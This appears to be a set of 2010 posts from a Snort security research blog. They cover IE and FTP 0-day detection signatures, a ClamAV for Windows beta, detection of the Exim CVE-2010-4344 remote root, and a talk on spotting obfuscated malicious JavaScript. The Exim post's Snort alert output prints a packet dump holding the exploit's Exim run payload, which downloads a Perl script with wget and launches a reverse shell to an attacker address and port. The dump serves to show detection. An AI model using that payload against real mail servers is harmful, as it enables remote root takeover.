Thursday, December 23, 2010

'Tis the Season for 0-days

Hello, all! This is just a quick note that Microsoft has released a bulletin regarding a new 0-day in Internet Explorer versions 7 and 8. You can read all about it in their advisory at http://www.microsoft.com/technet/security/advisory/2488013.mspx as well as the reference for the CVE, 2010-3971. We have previously released coverage for this vulnerability in sids 18196 and 18240. Because we released coverage before Microsoft posted their bulletin or a CVE had been assigned, these rules do not have those references. We will release updated rules with the new references after the holidays.

In addition to the above CSS issue, two other 0-days have been making the rounds lately that I wanted to call attention to -- a vulnerable Active-X control that allows remote code execution that we defend against with sids 18241 and 18242 and a vulnerability in the Windows 7 IIS7.5 FTP server that we defend against with sid 18243. The FTP vulnerability does not require authentication and has the potential for remote code execution, so be sure to defend your servers and/or disable FTP if you're not using it. Neither of these vulnerabilities have in-depth bulletins written about them, just exploit code that is openly available online.

Monday, December 20, 2010

ClamAV 3.0 for Windows Open Beta

The public beta for ClamAV for Windows 3.0, which includes full integration of the ClamAV engine into the Immunet Protect product is now open. If you are interested in playing with ClamAV for Windows 3.0 please check out the following link:

Beta Announcement

The download links for the binaries are here:
(32 Bit) - Download
(64 Bit) - Download

Main feature overview:

* ClamAV 0.96.5 libraries for real-time scanning and offline scanning
* Customizable signatures support and signature creation UI
* Wildcard exclusions - specifically so we can exclude Thunderbird's %TEMP%\nsmail*.tmp
* Unicode bug fixes
* Bug fix for user's getting in a disconnected state

A few things to remember

Because this is a Beta 1:

* It is strongly recommended that you test on a VM
* See Bugzilla and Immunet Forums for any additional known defects.

Things to try out:
1. The SigUI - This allows you to create your own ClamAV signatures and load them into the engine. Its both a GUI, and a command line tool. Documentation is available here
2. Writing ClamAV sigs doc is here
3. False positives on installed applications or new applications

Reporting bugs :

Please report bugs at Bugzilla. Remember to attach a run of the System Diag Tool to help speed up fixing the problem. (its located in the Program Folder for ClamAV for Windows). It drops a zip file on the desktop.

Known issues:
1. Binaries are still labeled 2.0
2. Scan history screen contains duplicate entries.

Tuesday, December 14, 2010

Exim Remote Root

We've heard from a number of Sourcefire customers and open-source Snort users lately, asking us whether we'll be releasing coverage for last week's Exim remote root (CVE-2010-4344 for those keeping score at home). Based on what hit the Exim-dev mailing list, we felt confident that the SMTP preprocessor would catch the vulnerability; after testing with the proof-of-concept sent to the Full-Disclosure mailing list on Saturday, we've confirmed that SID 124:2:1 does the job nicely:

# ~/snort-2.9.0$ src/snort -c etc/snort.2900.conf -q -A cmg -r ~/pcaps/cve-2010-4344-full-disclosure.pcap
12/14-09:15:37.145472  [**] [124:2:1] (smtp) Attempted data header buffer overflow: 2896 chars [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.1.11.11:35781 -> 10.1.11.111:25
Stream reassembled packet
12/14-09:15:37.145472 00:0D:57:C7:22:C7 -> A4:BA:DC:19:DD:5F type:0x800 len:0xB92
10.1.11.11:35781 -> 10.1.11.111:25 TCP TTL:64 TOS:0x0 ID:47277 IpLen:20 DgmLen:2948 DF
***A**** Seq: 0xAFFD7BE6  Ack: 0x16168E70  Win: 0x7140  TcpLen: 32
20 2F 74 6D 70 2F 63 2E 70 6C 20 31 30 2E 31 2E   /tmp/c.pl 10.1.
31 31 2E 31 31 20 34 34 34 34 3B 27 7D 7D 20 24  11.11 4444;'}} $
7B 72 75 6E 7B 2F 62 69 6E 2F 73 68 20 2D 63 20  {run{/bin/sh -c
27 77 67 65 74 20 68 74 74 70 3A 2F 2F 77 77 77  'wget http://www
2E 65 78 61 6D 70 6C 65 2E 63 6F 6D 2F 73 68 65  .example.com/she
6C 6C 2E 74 78 74 20 2D 4F 20 2F 74 6D 70 2F 63  ll.txt -O /tmp/c
2E 70 6C 3B 70 65 72 6C 20 2F 74 6D 70 2F 63 2E  .pl;perl /tmp/c.
70 6C 20 31 30 2E 31 2E 31 31 2E 31 31 20 34 34  pl 10.1.11.11 44
34 34 3B 27 7D 7D 20 24 7B 72 75 6E 7B 2F 62 69  44;'}} ${run{/bi
...
No configuration is necessary; the default settings for the SMTP preprocessor will work here. For anyone who may have tweaked their config, ensure that the max_header_line_len is set to 2000 bytes or less (a reasonable value for all but the most unique of environments; the default value is 1000 bytes).

Friday, December 3, 2010

Detecting Obfuscated Malicious JavaScript with Snort and Razorback

Unlike most Americans, who were busy recovering from a turkey-induced coma, I spent this past weekend at the Hackers 2 Hackers Conference in Sao Paulo, Brazil. In addition to being a nice respite from the cold weather in DC, the event featured excellent speakers on topics as diverse as PDF analysis and fresh memory exploitation techniques.

One of those talks was my own, "Detecting Obfuscated Malicious JavaScript with Snort and Razorback" (PDF of slides). Given the quality of the other presentations, I doubted my work would attract much attention; however, if the number of people who've contacted me since my talk are any indication, I must have done something right.

In a nutshell, the concept that came out of my talk revolves around language-based anomaly detection. A trained analyst or JavaScript programmer has no problem looking at most malicious code and seeing it as such right away; the goal, then, is to be able to teach the computer to do the same, in the form of a Razorback module. While there's plenty to be done to make a usable detection nugget - including considering some of the excellent suggestions I've received from those who saw me speak - thus far the concept has proven itself useful enough to at least warrant further development.

That said, I'd love to get feedback from the broader community on this idea. Please take a look at my slides, and if you have any suggestions, questions, etc., post them below or email me directly at alex kirk sourcefire com. I hope to have functioning source code online at http://labs.snort.org/razorback/ by the end of 2010.